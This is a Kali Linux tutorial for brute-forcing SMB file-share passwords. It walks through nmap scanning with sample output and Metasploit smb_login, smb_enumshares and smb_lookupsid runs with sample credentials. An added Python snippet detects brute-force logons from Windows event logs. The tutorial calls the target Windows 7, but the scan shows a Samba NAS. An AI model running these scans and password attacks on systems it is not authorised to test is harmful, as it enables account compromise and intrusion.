Kali Linux: Cracking a File Sharing Password on Windows 7
Network Scan
Example
 nmap -sS -A -O 192.168.0.7
 nmap -sS -A -O 192.168.0.0/24
 nmap -sS -A -O 192.168.0.7,90
Example output
 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 07:41 WIB
 Nmap scan report for 192.168.0.7
 Host is up (0.0027s latency).
 Not shown: 989 closed ports
 PORT      STATE SERVICE     VERSION
 22/tcp    open  ssh         OpenSSH 3.7.1p2 (protocol 2.0)
 | ssh-hostkey:
 |_  1024 17:60:bb:44:2f:36:d8:df:6b:98:fb:63:7f:52:a7:a1 (RSA)
 80/tcp    open  http        lighttpd 1.4.31
 |_http-server-header: lighttpd/1.4.31
 |_http-title: Site doesn't have a title (text/html).
 139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
 443/tcp   open  ssl/http    lighttpd 1.4.31
 | http-cisco-anyconnect:
 |_  ERROR: Not a Cisco ASA or unsupported version
 |_http-server-header: lighttpd/1.4.31
 |_http-title: Site doesn't have a title (text/html).
 | ssl-cert: Subject: commonName=develop/organizationName=buffalo/stateOrProvinceName=Tokyo/countryName=JP
 | Not valid before: 2007-06-13T05:47:53
 |_Not valid after: 2027-06-08T05:47:53
 |_ssl-date: 2016-02-10T23:18:49+00:00; -1h25m51s from scanner time.
 445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
 873/tcp   open  rsync       (protocol version 30)
 8873/tcp  open  ssl/rsync   (protocol version 30)
 9001/tcp  open  http        libwww-perl-daemon httpd 1.36
 | http-cisco-anyconnect:
 |_  ERROR: Not a Cisco ASA or unsupported version
 | http-robots.txt: 1 disallowed entry
 |_/
 |_http-title: Squeezebox Server
 9050/tcp  open  upnp        TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0; SDK 1.1)
 9090/tcp  open  http        uTorrent WebUI
 |_http-methods: No Allow or Public header in OPTIONS response (status code 400)
 |_http-title: Site doesn't have a title (text/html).
 22939/tcp open  ssl/unknown
 MAC Address: 4C:E6:76:1F:15:4C (Buffalo)
 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
 Network Distance: 1 hop
 Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:microsoft:windows

 Host script results:
 |_nbstat: NetBIOS name: TS-WVHL54C, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb-os-discovery:
 |   OS: Unix (Samba 3.6.3-31a.osstech)
 |   Computer name: TS-WVHL54C
 |   NetBIOS computer name:
 |   Domain name:
 |   FQDN: TS-WVHL54C
 |_  System time: 2016-02-11T06:18:51+07:00
 | smb-security-mode:
 |   account_used: guest
 |   authentication_level: user
 |   challenge_response: supported
 |_  message_signing: disabled (dangerous, but default)
 |_smbv2-enabled: Server doesn't support SMBv2 protocol

 TRACEROUTE
 HOP RTT     ADDRESS
 1   2.71 ms 192.168.0.7

 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 205.58 seconds
Hack Password
Using brute force to hack the password. This method is quite "noisy" because all of our activity is recorded / logged by the server, so it will be detected.
 msfconsole
 use auxiliary/scanner/smb/smb_login
 show options
 set RHOSTS 192.168.0.7
 set SMBUser onno
 set PASS_FILE '/home/sathish/password'
 set THREADS 10
 run
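The logging mentioned above is what lets a defender spot this activity. The following is an added example, not part of the original page: it flags bursts of failed network logons (Windows Security event 4625, logon type 3) from one source against one account, and a successful logon (4624) that follows such a burst. The comma-separated record layout, the sample records, and the threshold and window values are assumptions made for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample records (not from the page): time, event ID, logon type,
# account, source IP. 4625 = failed logon, 4624 = successful logon, type 3 = network.
SAMPLE_EVENTS = """\
2016-02-11T07:50:01,4625,3,onno,192.168.0.50
2016-02-11T07:50:02,4625,3,onno,192.168.0.50
2016-02-11T07:50:02,4625,3,onno,192.168.0.50
2016-02-11T07:50:03,4625,3,onno,192.168.0.50
2016-02-11T07:50:04,4625,3,onno,192.168.0.50
2016-02-11T07:50:05,4625,3,onno,192.168.0.50
2016-02-11T07:50:06,4624,3,onno,192.168.0.50
2016-02-11T07:51:10,4625,3,budi,192.168.0.21
2016-02-11T07:51:20,4624,3,budi,192.168.0.21
2016-02-11T07:52:00,4625,2,onno,-
"""

def parse(text):
    for line in text.strip().splitlines():
        ts, event_id, logon_type, account, src = line.split(",")
        yield datetime.fromisoformat(ts), int(event_id), int(logon_type), account, src

def detect_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Alert when one source fails `threshold` network logons for one account
    inside `window`, and again if that source then logs on successfully."""
    recent = defaultdict(deque)  # (source, account) -> recent failure times
    flagged = set()              # keys with an active brute-force alert
    alerts = []
    for ts, event_id, logon_type, account, src in sorted(parse(text)):
        if logon_type != 3:
            continue  # ignore interactive and other non-network logons
        key = (src, account)
        fails = recent[key]
        while fails and ts - fails[0] > window:
            fails.popleft()  # drop failures that fell out of the window
        if not fails:
            flagged.discard(key)  # burst has aged out; allow a fresh alert later
        if event_id == 4625:
            fails.append(ts)
            if len(fails) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("bruteforce", src, account, ts.isoformat()))
        elif event_id == 4624:
            if key in flagged:  # success during a burst: password may have been guessed
                alerts.append(("success_after_bruteforce", src, account, ts.isoformat()))
            flagged.discard(key)
            fails.clear()
    return alerts
```

Calling `detect_bruteforce(SAMPLE_EVENTS)` returns one alert for the burst from 192.168.0.50 and one for the successful logon that follows it; the single mistyped password from 192.168.0.21 and the local logon failure are ignored.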
Using the smb_enumshares module, we can enumerate every SMB share available on the remote system.
 use auxiliary/scanner/smb/smb_enumshares
 show options
 set RHOSTS 192.168.31.2
 set SMBUser onno
 set SMBPass s3cr3t
 set THREADS 10
 run
The smb_lookupsid module brute-forces SID lookups on a range of targets to determine which local users exist on the system.
 use auxiliary/scanner/smb/smb_lookupsid
 show options
 set RHOSTS 192.168.31.2
 set SMBPass bhuvi
 set SMBUser sathish
 run